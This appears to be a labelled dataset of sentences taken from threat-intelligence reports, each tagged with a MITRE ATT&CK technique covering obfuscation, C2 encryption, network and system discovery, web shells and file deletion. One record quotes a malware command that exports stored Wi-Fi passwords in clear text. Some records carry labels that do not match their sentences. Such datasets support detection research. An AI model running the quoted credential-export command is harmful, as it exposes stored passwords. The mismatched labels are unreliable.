{"text1":"WindowsDefender.ini \u2013 The Base64 encoded and obfuscated PowerShell script","labels":"['T1027']"}
|
|
{"text1":"Figure 3: The first step of decryption will perform XOR on one byte using the previous adjacent byte, starting from the last byte and excluding the first byte Figure 4: The second step uses RC4, using the first 0x20 bytes from the result of the first step as the RC4 key Figure 5: Encrypted (Top) and decrypted (bottom) configuration file It is also important to note that while the loader component and the configuration file are located in the same directory (%windows%\\system32), the encrypted backdoor is located in a different directory (%Program Files%\\Common Files\\System\\ado)","labels":"['T1027']"}
|
|
{"text1":"All strings used by the Trojan are encrypted with the XOR algorithm","labels":"['T1027']"}
|
|
{"text1":"Next, the buffer is encrypted using the RC4 algorithm with the 50-byte key (also stored in the backdoor\u2019s body)","labels":"['T1027']"}
|
|
{"text1":"11 bytes of this buffer are encrypted with the XOR algorithm as follows: i = 0 while ( 1 ) { crypted_buffer = (_BYTE *)this_->crypted_buffer; if ( i >= this->crypted_buffer_size - 4 ) \/\/ this->crypted_buffer_size == 15 break; ++i; crypted_buffer[i + 4] ^= crypted_buffer[i & 3]; The generated buffer is encoded using the BASE64 alphabet, where the last two characters are replaced with \u201c-\u201d and \u201c_\u201d","labels":"['T1027']"}
|
|
{"text1":"Next, to the beginning of the BASE64 string a random BASE64 string with the length of 5 characters is added","labels":"['T1027']"}
|
|
{"text1":"The first 11 bytes of the received buffer are encrypted with the XOR algorithm","labels":"['T1027']"}
|
|
{"text1":"Once it is encrypted using the XOR algorithm, the buffer is encoded with BASE64","labels":"['T1027']"}
|
|
{"text1":"These redirects were implemented by adding two malicious scripts obfuscated by a tool similar to the Dean Edwards packer","labels":"['T1027']"}
|
|
{"text1":"Many of the Fetch samples we analyzed attempted to obfuscate their functionality by encrypting their embedded strings using AES","labels":"['T1027']"}
|
|
{"text1":"Although the activity was previously linked by others to the FIN7 threat actor group, our research suggests the activity is in fact espionage related and unlikely to be FIN7 related","labels":"['T1027']"}
|
|
{"text1":"Specifically, the following GitHub repositories appear to be controlled by the MuddyWater threat actor(s): [unknown SHA256] Downloads payload from: hxxps:\/\/raw.githubusercontent[.]com\/F0R3X\/BrowserFontArabic\/master\/ArabicBrowserFont.exe [unknown SHA256] Downloads payload from: hxxps:\/\/raw.githubusercontent[.]com\/F0R3X\/BrowserFontArabic\/master\/FontArabic.exe 9b5e36bb7518a9e333c31d09b589102f89e3425571dd434820ab3c437dc4e0d9 (and several others) Downloads payload from: hxxps:\/\/raw.githubusercontent[.]com\/ReactDeveloper2017\/react\/master\/src\/test\/test.js Interestingly, both profiles were populated with forked repositories to give them an air of legitimacy as shown in figure 2","labels":"['T1027']"}
|
|
{"text1":"The domain names differed but the script adheres to the same logic (including the logic function).\u201d The DNSMessenger malware is an obfuscated and customized version of the popular DNS_TXT_PWNAGE.ps1 script available on GitHub and is also referred to by FireEye as POWERSOURCE","labels":"['T1027']"}
|
|
{"text1":"Malicious obfuscated VBA code is executed when the macro is first enabled","labels":"['T1027']"}
|
|
{"text1":"In our analysis, the macro is obfuscated, character by character, using the decimal ASCII code","labels":"['T1027']"}
|
|
{"text1":"There are two forms of encrypted strings: an RSA256-encrypted string, and custom base64-encoded and RSA256-encrypted string","labels":"['T1027']"}
|
|
{"text1":"At face value, this current variant of OopsIE has a vast majority of its strings obfuscated, which can be deobfuscated by splitting the strings using the hyphen as a delimiter, treating each split value as an integer, subtracting one from each integer and converting each into a character","labels":"['T1027']"}
|
|
{"text1":"This tool was originally intended to aid defenders in simulating obfuscated PowerShell commands to better their defenses","labels":"['T1027']"}
|
|
{"text1":"Invoke-Obfuscation calls the variable obfuscation technique used by the actors to obfuscate this script Random Case + {} + Ticks, which changes all variables in the script to have randomly cased characters, to be surrounded in curly braces and to include the tick (`) character, which is ignored by PowerShell","labels":"['T1027']"}
|
|
{"text1":"By applying two specific obfuscation techniques within Invoke-Obfuscation, we were able to create an obfuscated PowerShell script that was very similar to the QUADAGENT payloads delivered in the attacks discussed in this blog","labels":"['T1027']"}
|
|
{"text1":"All the strings and settings were encrypted and obfuscated","labels":"['T1027']"}
|
|
{"text1":"The configuration and strings are encrypted using 3DES and Base64 encoding","labels":"['T1027']"}
|
|
{"text1":"The shellcode is not encrypted but is obfuscated","labels":"['T1027']"}
|
|
{"text1":"Decrypting the Configuration As previously mentioned, the real configuration data is stored in the first stage shellcode but it is not stored in cleartext, but encrypted and compressed","labels":"['T1027']"}
|
|
{"text1":"The configuration data is encrypted with the same algorithm described previously by JPCert but using a different XOR value","labels":"['T1027']"}
|
|
{"text1":"The configuration blob is encoded using a simple single-byte XOR scheme","labels":"['T1027']"}
|
|
{"text1":"KopiLuwak In November 2016, Kaspersky Lab observed a new round of weaponized macro documents that dropped a new, heavily obfuscated Javascript payload that we named KopiLuwak (one of the rarest and most expensive types of coffee in the world)","labels":"['T1027']"}
|
|
{"text1":"Figure 3: no detections for SpeakUp in Virus Total In an attempt to endure the investigation process by security researchers, the second stage payload was encoded with salted base64","labels":"['T1027']"}
|
|
{"text1":"Some strings are obfuscated with XOR x56","labels":"['T1027']"}
|
|
{"text1":"These files are stored within a 217kb encrypted cab file in the dropper\u2019s resources under the name \u201cA\u201d","labels":"['T1027']"}
|
|
{"text1":"The cab file was encrypted and decrypted using a simple xor cipher with a rotating 16 byte key: \\x36\\x11\\xdd\\x08\\xac\\x4b\\x72\\xf8\\x51\\x04\\x68\\x2e\\x3e\\x38\\x64\\x32","labels":"['T1027']"}
|
|
{"text1":"This is encrypted by RC4, using the key {0xb5, 0x78, 0x62, 0x52, 0x98, 0x3e, 0x24, 0xd7, 0x3b, 0xc6, 0xee, 0x7c, 0xb9, 0xed, 0x91, 0x62}","labels":"['T1027']"}
|
|
{"text1":"We\u2019ve identified two such files: settings.db sdfg3d.db Here\u2019s how such a database file appears: These are BASE64 encoded and use the same RC4 encryption key as the malware configuration","labels":"['T1027']"}
|
|
{"text1":"The CARROTBAT malware family is a somewhat unique dropper and while it supports various types of decoy documents, and employs rudimentary command obfuscation, it should be made clear that it is not sophisticated","labels":"['T1027']"}
|
|
{"text1":"HttpBrowser's executable code may be obfuscated through structured exception handling and return-oriented programming","labels":"['T1027']"}
|
|
{"text1":"All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks","labels":"['T1027']"}
|
|
{"text1":"Figure 7: The same de-obfuscated code as Figure 2 The only other script content of the blog-page[.]html is an empty script section","labels":"['T1027']"}
|
|
{"text1":"PlayList.vbs contains the obfuscated codes, which it executes after decrypting the obfuscations.","labels":"['T1027']"}
|
|
{"text1":"Once executed, Vcrodat loads an encrypted payload on to the victim\u2019s computer.","labels":"['T1027']"}
|
|
{"text1":"The JavaScript is heavily obfuscated. The first variable\u2014a\u2014is an array of obfuscated values","labels":"['T1027']"}
|
|
{"text1":"This shellcode is decrypted in memory through EQENDT32.EXE","labels":"['T1027']"}
|
|
{"text1":"The encrypted file contains a config file of 0x78 bytes. The data is decrypted with an 0xD9 XOR operation.","labels":"['T1027']"}
|
|
{"text1":"The actors have made some small changes, such as altering the variable names to avoid Yara detection","labels":"['T1027']"}
|
|
{"text1":"To operate and evade standard analysis tools, most of the functions are hashed","labels":"['T1027']"}
|
|
{"text1":"The encryption\/decryption routine (refer to Figure 5) can be summarized as follows: Figure 5: Encryption\/ Decryption Function Generate an array of integers from 0x00 to 0xff Scrambles the state of the table using the given key Encrypts or decrypts a string using the scrambled table from (b)","labels":"['T1573']"}
|
|
{"text1":"Version 2 Rather than using the host ID as the key, this version uses a random XOR key between 32 and 64 bytes in length that is generated for each session","labels":"['T1573']"}
|
|
{"text1":"A build tool is likely being used by these attackers that allows the operator to configure details such as C2 addresses, C2 encryption keys, and a campaign code","labels":"['T1573']"}
|
|
{"text1":"After applying this decryption algorithm, we are presented with the following data: h=HOSTNAME-PC&f=mission.ini&c=& The response made by the C2 server uses the same RC4 key for encryption","labels":"['T1573']"}
|
|
{"text1":"The BONDUPDATER script, which was named based on the hard-coded string \u201cB007\u201d, uses a custom DGA algorithm to generate subdomains for communication with the C2 server","labels":"['T1573']"}
|
|
{"text1":"Figure 9: Example Network Communication In the example, the POWRUNER client sends a random GET request to the C2 server and the C2 server sends the random number (99999999990) as a response","labels":"['T1573']"}
|
|
{"text1":"The structure of each of these outbound DNS requests is as follows: <system ID>-<job ID>-<offset in data><more data flag>-<random length of base64 encoded data between 30 and 42 characters>.<c2 domain> The payload will look for different responses to these outbound queries depending on the type of DNS request that the payload uses to communicate with the C2","labels":"['T1573']"}
|
|
{"text1":"The C2 server will provide the pre-shared key within the response data and will provide the session ID value via the Set-Cookie field within the response, specifically the string after the PHPSESSID parameter of the cookie","labels":"['T1573']"}
|
|
{"text1":"<encoded system data>.<same random number between 100000 and 999999 above>.<c2 name> \u00a0 After obtaining a session ID and pre-shared key, the PowerShell script will continue to communicate with its C2 server to obtain data to treat as a command","labels":"['T1573']"}
|
|
{"text1":"Instead, it immediately issues a query to resolve the following domain, which embeds the session ID value to transmit it to the C2: \u00a0 <encoded session id>.<same random number between 100000 and 999999>.<c2 domain name> \u00a0 To transmit the data via the DNS tunneling, the C2 server will respond to the above query with an IPv6 address that contains the number of DNS queries the payload must issue to obtain the entirety of the data from subsequent IPv6 answers","labels":"['T1573']"}
|
|
{"text1":"The script will send the specified number of DNS queries using the following format, each of which the C2 will respond with an IPv6 address that the script will treat as a string of data: \u00a0 www.<sequence number>.<same random number between 100000 and 999999>.<c2 domain name> \u00a0 The payload will treat the data provided by the C2 as a message, which will have the following structure: \u00a0 hello<char uuid[35]><char type[1]><data> \u00a0 The message will start with the string hello followed by a 35-character UUID string","labels":"['T1573']"}
|
|
{"text1":"Neither this new domain nor the IP it resolves to have been observed in the past, indicating that the sample in Table 3 may be associated with a newer campaign","labels":"['T1016']"}
|
|
{"text1":"Table 4: URL parameters Additionally, the command string is hashed using the same RGPH hashing algorithm as before","labels":"['T1016']"}
|
|
{"text1":"In one instance, a log file recovered from an open indexed server revealed that an IP address (112.66.188.28) located in Hainan, China had been used to administer the command and control node that was communicating with malware on victim machines","labels":"['T1016']"}
|
|
{"text1":"APT40 used MURKYSHELL at a compromised victim organization to port scan IP addresses and conduct network enumeration","labels":"['T1016']"}
|
|
{"text1":"In order to decide which domain xparis() holds, a variable pingadori() uses the radador() function to randomize the domain","labels":"['T1016']"}
|
|
{"text1":"Instructions within guide.txt explaining how to carry out DNS hijacking attack In one part of guide.txt, an example target appears to be provided, with a corresponding adversary IP (185.162.235[.]106) for the legitimate domain to be redirected to","labels":"['T1016']"}
|
|
{"text1":"Note that IP addresses can be reallocated","labels":"['T1016']"}
|
|
{"text1":"Backdoor.Pirpi also collects information about the target\u2019s local network, including the domain controller and workstations","labels":"['T1016']"}
|
|
{"text1":"Examining historical IP resolutions revealed a common IP between the active nameservers, 107.175.75[.]123","labels":"['T1016']"}
|
|
{"text1":"This IP is of particular interest as historical domain resolutions of this IP revealed that it had resolved to the domain hotmai1l[.]com in the past as well, which was a domain we had previously identified as having a high likelihood of association with DarkHydrus infrastructure","labels":"['T1016']"}
|
|
{"text1":"This IP also belongs to the same service provider and class B network range as another IP we had associated with DarkHydrus, 107.175.150[.]113 which specifically resolved to a domain name containing a victim organization\u2019s name","labels":"['T1016']"}
|
|
{"text1":"After the second DLL is loaded into memory, the first DLL overwrites the IP address for the control server, effectively changing the address the malware will communicate with","labels":"['T1016']"}
|
|
{"text1":"FBI has high confidence that HIDDEN COBRA actors are using the IP addresses for further network exploitation. This alert includes technical indicators related to specific North Korean government cyber operations and provides suggested response actions to those indicators, recommended mitigation techniques, and information on reporting incidents to the U.S","labels":"['T1016']"}
|
|
{"text1":"DHS and FBI recommend that network administrators review the IP addresses, file hashes, network signatures, and YARA rules provided, and add the IPs to their watchlist to determine whether malicious activity has been observed within their organization. When reviewing network perimeter logs for the IP addresses, organizations may find numerous instances of these IP addresses attempting to connect to their systems","labels":"['T1016']"}
|
|
{"text1":"The IP address in the lateral movement techniques was substituted with the local machine IP address to achieve code execution on the system","labels":"['T1016']"}
|
|
{"text1":"When we analyzed the email headers, we determined that the email was sent from an SMTP server using an IP associated with the Yonsei University network","labels":"['T1016']"}
|
|
{"text1":"text= from= ai= ags= oe= aq= btnG= oprnd= ai= utm= channel= The page address in the domain of the command and control server is chosen randomly from the list","labels":"['T1016']"}
|
|
{"text1":"Analysis of their configurations show that the C2 servers used both fully-qualified domain names and IP addresses","labels":"['T1016']"}
|
|
{"text1":"The code will gather some information about the system, specifically the local IP address, MAC address, and the external IP address of the system","labels":"['T1016']"}
|
|
{"text1":"Similar to Reaver as posted by Palo Alto, it gets the IP or domain of the C&C server, the port, name of the binary, a sleep timer, and what Palo Alto calls a \u201ccampaign identifier.\u201d Technical Details At this moment, we were unable to retrieve the original infection vector and other information regarding what other tools the APT15 group is using to attack their targets","labels":"['T1016']"}
|
|
{"text1":"Victim system reconnaissance The code then tries to obtain the victim\u2019s public IP via \u201chttps:\/\/api.ipify.org\/\u201d","labels":"['T1016']"}
|
|
{"text1":"If the first resolved domain IP address starts with 24.125.X.X, then it is set to 1","labels":"['T1016']"}
|
|
{"text1":"It is unknown what these domains may have been used for but based on the similarity of domain spoofing and sharing an IP, they are likely part of the adversary infrastructure","labels":"['T1016']"}
|
|
{"text1":"Inspecting the class C network for 185.162.235.0\/24 shows us that another IP on the same network resolves to an OilRig domain, msoffice-cdn[.]com which we identified in August 2017","labels":"['T1016']"}
|
|
{"text1":"The malware then requests a connection to 192.184.60.229 on TCP port 81 using the command \"05 01 00 01 c0 b8 3c e5 00 51\" and verifies that the first two bytes from the server are \"05 00\" (c0 b8 3c e5 is the IP address and 00 51 is the port in network byte order)","labels":"['T1016']"}
|
|
{"text1":"The chinapolicyanalysis.org domain was used as the sender address, as well as the hosting location of the malicious RTF document","labels":"['T1016']"}
|
|
{"text1":"The mericcs.org domain was used as the sender address, as well as the hosting location of the malicious RTF document","labels":"['T1016']"}
|
|
{"text1":"The structure of the domain mimics the Mercator Institute for China Studies (MERICS), whose actual domain is merics.org","labels":"['T1016']"}
|
|
{"text1":"Network Indicators\u200b Hostname IP Address Notes mailcenter.support 221.121.138.139 Domain used for sending spear phishes and user tracking","labels":"['T1016']"}
|
|
{"text1":"chinapolicyanalysis.org 185.130.212.168 Domain used for spear phish sender e-mail address and to host malicious documents","labels":"['T1016']"}
|
|
{"text1":"fprii.net 185.130.212.254 Domain used for spear phish sender e-mail address and to host malicious documents","labels":"['T1016']"}
|
|
{"text1":"mericcs.org 221.121.138.141 Domain used for spear phish sender e-mail address and to host malicious documents","labels":"['T1016']"}
|
|
{"text1":"In February 2018, several KHRAT associated domains began resolving to the IP address 89.46.222[.]97","labels":"['T1016']"}
|
|
{"text1":"One of these domains, facebook-apps[.]com, was identified in one of the malware samples associated with this IP address","labels":"['T1016']"}
|
|
{"text1":"The diagram in Figure 1 shows the samples, domains, IP addresses and e-mail addresses that we identified during our investigation (See Appendix B\u00a0for more detail on these.) There is a clear split between Cluster A and Cluster B, with no infrastructure overlap between the two","labels":"['T1016']"}
|
|
{"text1":"One of the first steps that several Mosquito installer packages performed after writing and running this local_update js file was to export all local host\u2019s WiFi profiles (settings and passwords) to %APPDATA%\\<profile>.xml with a command line call: cmd.exe \/c netsh wlan export profile key=clear folder=\"%APPDATA%\" They then gather more network information with a call to ipconfig and arp -a","labels":"['T1016']"}
|
|
{"text1":"hxxp:\/\/www.sanjosemaristas[.]com\/app\/index.php?{A01BA0AD-9BB3-4F38-B76B-A00AD11CBAAA}, providing the current network adapter\u2019s service name GUID","labels":"['T1016']"}
|
|
{"text1":"In Figure 9, below, red indicates targeted IP addresses, malware, registrant information, and domains associated with the targeted attack campaign while blue indicates criminal attack IP addresses, malware used, registrant information, and domains: Figure 9","labels":"['T1016']"}
|
|
{"text1":"(Source: Dell SecureWorks) As shown in Figure 10, the unpacked JavaScript code reveals an iframe pointing to an IP address that is hosting the exploit","labels":"['T1016']"}
|
|
{"text1":"It is a preferred platform within data centers and the cloud for businesses, as well as an ongoing favorite when it comes to a majority of Internet-facing web and application servers","labels":"['T1505.003']"}
|
|
{"text1":"Furthermore, this group has routinely identified and exploited vulnerable web servers of targeted organizations to install web shells, such as ANTAK and ASPXSPY, and used stolen legitimate credentials to compromise externally facing Outlook Web Access (OWA) resources","labels":"['T1505.003']"}
|
|
{"text1":"Attack Lifecycle Initial Compromise APT40 has been observed leveraging a variety of techniques for initial compromise, including web server exploitation, phishing campaigns delivering publicly available and custom backdoors, and strategic web compromises","labels":"['T1505.003']"}
|
|
{"text1":"Web shells are heavily relied on for nearly all stages of the attack lifecycle","labels":"['T1505.003']"}
|
|
{"text1":"Internal web servers are often not configured with the same security controls as public-facing counterparts, making them more vulnerable to exploitation by APT40 and similarly sophisticated groups","labels":"['T1505.003']"}
|
|
{"text1":"Maintain Presence APT40 primarily uses backdoors, including web shells, to maintain presence within a victim environment","labels":"['T1505.003']"}
|
|
{"text1":"APT40 strongly favors web shells for maintaining presence, especially publicly available tools","labels":"['T1505.003']"}
|
|
{"text1":"OwaAuth \u2014 This web shell and credential stealer deployed to Microsoft Exchange servers is installed as an ISAPI filter","labels":"['T1505.003']"}
|
|
{"text1":"(Source: SecureWorks) China Chopper web shell \u2014 This web-based executable script communicates with a full-featured user interface to allow threat actors to transfer and create files, open a command terminal, and interact with database servers","labels":"['T1505.003']"}
|
|
{"text1":"(Source: SecureWorks) In multiple instances, CTU researchers observed artifacts from unsuccessful attempts to create a web shell on web-accessible JBOSS-based service desk software, followed by use of a functional shell to gain access to the environment","labels":"['T1505.003']"}
|
|
{"text1":"(Source: SecureWorks) Reentry attempt After BRONZE UNION was evicted from a compromised environment, which involved blocking the group's known infrastructure, CTU researchers observed the group attempting to reconnect to its OWA web shells and a backup web shell it had deployed during the intrusion","labels":"['T1505.003']"}
|
|
{"text1":"To report an intrusion and request resources for incident response or technical assistance, you are encouraged to contact DHS NCCIC (NCCICCustomerService@hq.dhs.gov or 888-282-0870), the FBI through a local field office, or the FBI\u2019s Cyber Division (CyWatch@fbi.gov or 855-292-3937). Protect Against SQL Injection and Other Attacks on Web Services To protect against code injections and other attacks, system operators should routinely evaluate known and published vulnerabilities, periodically perform software updates and technology refreshes, and audit external-facing systems for known web application vulnerabilities","labels":"['T1505.003']"}
|
|
{"text1":"They should also take the following steps to harden both web applications and the servers hosting them to reduce the risk of network intrusion via this vector. Use and configure available firewalls to block attacks. Take steps to secure Windows systems, such as installing and configuring Microsoft\u2019s Enhanced Mitigation Experience Toolkit (EMET) and Microsoft AppLocker. Monitor and remove any unauthorized code present in any www directories. Disable, discontinue, or disallow the use of Internet Control Message Protocol (ICMP) and Simple Network Management Protocol (SNMP) as much as possible. Remove unnecessary HTTP verbs from web servers","labels":"['T1505.003']"}
|
|
{"text1":"Typical web servers and applications only require GET, POST, and HEAD. Where possible, minimize server fingerprinting by configuring web servers to avoid responding with banners identifying the server software and version number. Secure both the operating system and the application. Update and patch production servers regularly. Disable potentially harmful SQL-stored procedure calls. Sanitize and validate input to ensure that it is properly typed and does not contain escaped code. Consider using type-safe stored procedures and prepared statements. Audit transaction logs regularly for suspicious activity. Perform penetration testing on web services. Ensure error messages are generic and do not expose too much information. Permissions, Privileges, and Access Controls System operators should take the following steps to limit permissions, privileges, and access controls. Reduce privileges to only those needed for a user\u2019s duties. Restrict users\u2019 ability (permissions) to install and run unwanted software applications, and apply the principle of \u201cLeast Privilege\u201d to all systems and services","labels":"['T1505.003']"}
|
|
{"text1":"Additionally, on that same url, http:\/\/mdzz2019.noip[.]cn:3654\/ is used to distribute more versions of this Gh0stRAT sample, along with a .zip file containing ASPXSpy, a web shell","labels":"['T1505.003']"}
|
|
{"text1":"Audit ISAPI filters and search for web shells on Microsoft Exchange servers","labels":"['T1505.003']"}
|
|
{"text1":"(Source: Dell SecureWorks) Passwords, like \"admin-na-google123!@#\" shown in Figure 4, are required to interact with the web shell","labels":"['T1505.003']"}
|
|
{"text1":"TG-3390 has used additional web shells containing similarly formatted passwords","labels":"['T1505.003']"}
|
|
{"text1":"However, the OwaAuth web shell password contains the victim organization's name","labels":"['T1505.003']"}
|
|
{"text1":"More information about the OwaAuth web shell is available in Appendix C","labels":"['T1505.003']"}
|
|
{"text1":"ASPXTool \u2014 A modified version of the ASPXSpy web shell (see Figure 6)","labels":"['T1505.003']"}
|
|
{"text1":"The OwaAuth web shell is likely created with a builder, given that the PE compile time of the binary does not change between instances and the configuration fields are padded to a specific size","labels":"['T1505.003']"}
|
|
{"text1":"The adversaries modify publicly available tools such as ASPXSpy to remove identifying characteristics that network defenders use to identify web shells","labels":"['T1505.003']"}
|
|
{"text1":"TG-3390 actors have deployed the OwaAuth web shell to Exchange servers, disguising it as an ISAPI filter","labels":"['T1505.003']"}
|
|
{"text1":"They then identify the Exchange server and attempt to install the OwaAuth web shell","labels":"['T1505.003']"}
|
|
{"text1":"If the OwaAuth web shell is ineffective because the victim uses two-factor authentication for webmail, the adversaries identify other externally accessible servers and deploy ChinaChopper web shells","labels":"['T1505.003']"}
|
|
{"text1":"(Source: Dell SecureWorks) To facilitate lateral movement, the adversaries deploy ASPXTool web shells to internally accessible systems running IIS","labels":"['T1505.003']"}
|
|
{"text1":"Mapping of TG-3390's interactions with web shells during an intrusion responded to by CTU researchers","labels":"['T1505.003']"}
|
|
{"text1":"OwaAuth web shell PDB string","labels":"['T1505.003']"}
|
|
{"text1":"Each web shell instance is configured to contain SP, Key, and Log variables","labels":"['T1505.003']"}
|
|
{"text1":"OwaAuth web shell command set","labels":"['T1505.003']"}
|
|
{"text1":"The stylecs.aspx webshell provides fairly significant functionality, as its developer wrote this webshell in JScript that ultimately runs any supplied JScript code provided to it within the HTTP request.","labels":"['T1505.003']"}
|
|
{"text1":"The MPK Trojan also monitors specifically for windows that are likely to contain login forms for popular web-based email clients, such as titles that contain: \u201cGmail -\u201d \u201cYahoo \u2013 login\u201d \u201cSign In -\u201d \u201cOutlook.com -\u201c MPK will attempt to parse these window titles to identify the associated email address and record these to the log file using the following format: \/\/\/\/\/\/\/\/\/\/\/\/\/ Mail Find <email address> \/\/\/\/\/\/\/\/\/\/\/ If the Trojan does not find the window titles associated with Gmail, Yahoo or Outlook, it saves the title to the \u201cSave.tmp\u201d file in the following format: +++++++++++++ Window= <window title> +++++++++++++ The major difference between the IRC variant and non-IRC variant of MPK is the C2 protocol used","labels":"['T1010']"}
|
|
{"text1":"Offset Description 0x0 Victim GUID (8C8CEED9-4326-448B-919E-249EEC0238A3) 0x25 Victim IP Address (192.168.180.154) 0x45 Command (0x66660001) 0x49 Length of payload (0x2f \u2013 47) 0x4d Field 1 \u2013 Windows major version (0x6 \u2013 Windows Vista+) 0x51 Field 2 \u2013 Windows minor version (0x1 \u2013 Windows 7) 0x55 Field 3 \u2013 Unknown (0x20) 0x59 Payload (default flag:4\/2\/2018 1:01:33 AM) Table 5 \u2013 Beacon structure for PLAINTEE","labels":"['T1010']"}
|
|
{"text1":"Linux malware detection and prevention is not prevalent at this time, but Palo Alto Networks customers are protected through our next-generation security platform: IPS signature 14917 deployed to identify and prevent command and control activity The C2 domains and files mentioned in this report are blocked in our Threat Prevention product","labels":"['T1070.004']"}
|
|
{"text1":"The organization managed to discover what scripts were hosted on the server before BE\/SandWorm gang deleted them, and\u00a0unfortunately couldn\u2019t restore them after they were deleted","labels":"['T1070.004']"}
|
|
{"text1":"For example, at the end of 2016 CTU researchers observed the threat actors using native system functionality to disable logging processes and delete logs within a network","labels":"['T1070.004']"}
|
|
{"text1":"After running within the %TEMP% path, Comnie will delete the original file","labels":"['T1070.004']"}
|
|
{"text1":"KEYS Deletes the file named by tempPath + \u201cky\u201d file so as not to upload anything","labels":"['T1070.004']"}
|
|
{"text1":"HDS Deletes the file created by the HD command to reverse the effect","labels":"['T1070.004']"}
|
|
{"text1":"DEL-TEMP Deletes all files in the \u201cAppData\/Local\/Temp\u201d path","labels":"['T1070.004']"}
|
|
{"text1":"Overwrite a file with all zeros and mark it for deletion on reboot Wiping files with zeros and marking it for deletion on reboot.\u00a0 Delete files using the DeleteFile() API Load an arbitrary library into its process space","labels":"['T1070.004']"}
|
|
{"text1":"The SHAPESHIFT malware is capable of wiping disks, erasing volumes and deleting files, depending on its configuration","labels":"['T1070.004']"}
|
|
{"text1":"Appendix Malware Family Descriptions Malware Family Description Availability DROPSHOT Dropper that has been observed dropping and launching the TURNEDUP backdoor, as well as the SHAPESHIFT wiper malware Non-Public NANOCORE Publicly available remote access Trojan (RAT) available for purchase","labels":"['T1070.004']"}
|
|
{"text1":"The message sent to the C2 will be \u201cfile is deleted.\u201d if successful or \u201cfile is not deleted.\u201d if unsuccessful","labels":"['T1070.004']"}
|
|
{"text1":"The dropped executable (MD5: 78734CD268E5C9AB4184E1BBE21A6EB9) contains the compressed FELIXROOT dropper component in the Portable Executable (PE) binary overlay section","labels":"['T1070.004']"}
|
|
{"text1":"The dropper will delete itself at the end of the process","labels":"['T1070.004']"}
|
|
{"text1":"After this file is copied, the original \u2018Update.~tmp\u2019 file is deleted","labels":"['T1070.004']"}
|
|
{"text1":"boom! Deletes GID.bin, ShwDoc.VBS and ShwDoc.srv files, as well as the scheduled task whose name is a GUID stored in the GID.bin file","labels":"['T1070.004']"}
|
|
{"text1":"Also, the x command will delete the generated registry key and the Office365DCOMCheck\/SystemDiskClean scheduled task","labels":"['T1070.004']"}
|
|
{"text1":"This system configuration file (in.sys) will drop a backdoor installer (UserInstall.exe) then delete itself","labels":"['T1070.004']"}
|
|
{"text1":"and then deletes the original launcher","labels":"['T1070.004']"}
|
|
{"text1":"This version of the campaign made malicious use of unins000.exe, a process that belongs to the Brazilian information security company GAS Tecnologia, to gather personal information undetected","labels":"['T1082']"}
|
|
{"text1":"The autonomous system name of the IP shows that the allocation is controlled by Serverius Holding B.V., which is an autonomous system name we have previously seen associated with the OilRig group","labels":"['T1082']"}
|
|
{"text1":"This backdoor collects system information, including the operating system version and hostname, and includes functionality to check, upload, and register plugins that can further enhance its capabilities","labels":"['T1082']"}
|
|
{"text1":"The data above contains the hostname (\u2018HOSTNAME-PC\u2019) of the victim machine, as well as an instruction","labels":"['T1082']"}
|
|
{"text1":"To obtain a job, the Trojan builds a subdomain that has the following structure and issues a DNS query to the C2 server: c<unique identifier><job identifier padded with \u20180\u2019 to make three digits><sequence number>c The generated subdomain is then subjected to a number-to-character substitution function that is the inverse of the Table 4, which effectively converts all the digits in the subdomain into characters","labels":"['T1082']"}
|
|
{"text1":"Once the second DLL is executed, it gathers information about the victim system\u2019s setup, such as operating system version, and driver and processor information","labels":"['T1082']"}
|
|
{"text1":"One computer that was infected with both Cadelspy and Remexi was a system that ran a SIM card editing application","labels":"['T1082']"}
|
|
{"text1":"Other functionalities provided by this section of the PowerShell Script are as follows: Retrieves the following data from the system by leveraging Windows Management Instrumentation (WMI) queries and environment variables: IP Address from Network Adapter Configuration OS Name OS Architecture Computer Name Computer Domain Name Username All of this data is concatenated and formatted as shown in Figure 13: Figure 13: Concatenated and formatted data retrieved by PowerShell script Register the victim\u2019s machine to the C2 server by sending the REGISTER command to the server","labels":"['T1082']"}
|
|
{"text1":"Freenki is used to gather information about the infected system and to download a subsequent stage payload","labels":"['T1082']"}
|
|
{"text1":"The information this malware collected included the following: The computer name The username The execution path of the sample The BIOS model A randomly-generated ID to uniquely identify the system Group123 utilized this method to ensure their victim was (a) someone they wanted to target further and (b) someone they could infect further based on the information obtained from the reconnaissance phase","labels":"['T1082']"}
|
|
{"text1":"After connecting to the IRC server, the MPK bot sends custom ping messages and provides an introduction via a \u201c!Hello\u201d message that contains the current logged in user of the infected host, if the user has administrator privileges, the hostname, the UUID of the system, and operating system version","labels":"['T1082']"}
|
|
{"text1":"The malware queries the Windows API to get the computer name, user name, volume serial number, Windows version, processor architecture and two additional values, which are \u201c1.3\u201d and \u201cKdfrJKN\u201d","labels":"['T1082']"}
|
|
{"text1":"As we can see, the following information is present within this configuration: Remote Command and Control (C2) server Remote port Sleep timer Reaver continues to collect various information from the victim machine, including the following: CPU speed Computer name Username IP Address Microsoft Windows version Physical and virtual memory information The malware proceeds to communicate with the remote server via HTTP GET and POST requests","labels":"['T1082']"}
|
|
{"text1":"Reaver continues to collect various information from the victim machine, including the following: Computer name Volume serial number Microsoft Windows version CPU speed ANSI code page OEM code page identifier for the operating system Physical and virtual memory information Reaver encrypts this data using an incremental XOR key and uploads it to the configured remote server on the port specified","labels":"['T1082']"}
|
|
{"text1":"Here is an example of the result of ps\u00a0ax on an infected system: $ ps ax[...] 566 ?? Ss 0:00.01 \/usr\/libexec\/icloudsyncd -launchd netlogon.bundle[...] Figure 8: Result of ps ax on an infected system Keychain stealing The OSX\/Keydnap backdoor is equipped with a mechanism to gather and exfiltrate passwords and keys stored in OS X\u2019s keychain","labels":"['T1082']"}
|
|
{"text1":"This phase will often leverage a specialized tool that automatically collects a wide array of information including credentials, group management policies, and even system logs to better hone further attacks and assure execution of their malware","labels":"['T1082']"}
|
|
{"text1":"A noteworthy addition to the Poseidon toolkit is the IGT supertool (Information Gathering toolkit), a bulking 15 megabyte executable that orchestrates a series of different information collections steps, exfiltration, and the cleanup of components","labels":"['T1082']"}
|
|
{"text1":"A multilayered approach is a must to securing the organization\u2019s perimeter, especially for information security professionals and system\/IT administrators","labels":"['T1082']"}
|
|
{"text1":"This variation of the Zebrocy downloader begins by gathering the serial number for the storage volume with the label \u201cC:\\\u201d and the computer name","labels":"['T1082']"}
|
|
{"text1":"Download & execute Startup (with persistence) Collection of system information (OS, version, installed location, etc.) Self-update Uninstall This project was created by a user called zettabithf which is linked to a user with the same name in Hack Forums","labels":"['T1082']"}
|
|
